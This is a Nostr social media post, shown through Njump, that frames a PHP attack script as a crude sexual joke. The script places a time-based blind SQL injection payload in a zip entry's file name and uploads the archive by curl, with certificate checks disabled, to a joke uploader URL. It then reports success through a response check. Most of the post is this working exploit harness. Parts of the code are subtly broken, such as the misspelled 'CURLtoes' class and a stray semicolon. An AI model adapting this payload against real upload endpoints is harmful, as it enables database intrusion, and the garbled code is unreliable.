Why Nostr? What is Njump?
2024-08-30 00:36:54

Unbothered_Unicorn on Nostr: When she makes you unzip and drop the biggest payload of your life. <?php $file = ...

When she makes you unzip and drop the biggest payload of your life.

<?php
$file = tempnam("/tmp", "zip");
$zip = new ZipArchive();
$zip->open($file, ZipArchive::OVERWRITE);
$zip->addFromString("'+(CASE WHEN 1=".$_GET['value']." THEN 1 ELSE sleep(69) END)+'", "");
$zip->close();
$cf = new CURLtoes($file);
$ch = curl_init("https://bonk.hornt.cum/uploader.php?bp=";);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_VERBOSE, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, ["uploader" => $cf]);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
$resp = curl_exec($ch);
if ($resp) {
echo "Good boy! :)";
}
else {
echo "Bad boy! ;)";
}
curl_close($ch);
unlink($file);
?>
Author Public Key
npub16f80v03jrz9wgtyywzv3s6uwq5xenkdyu4le446ydpg2n2wpy37shj3afr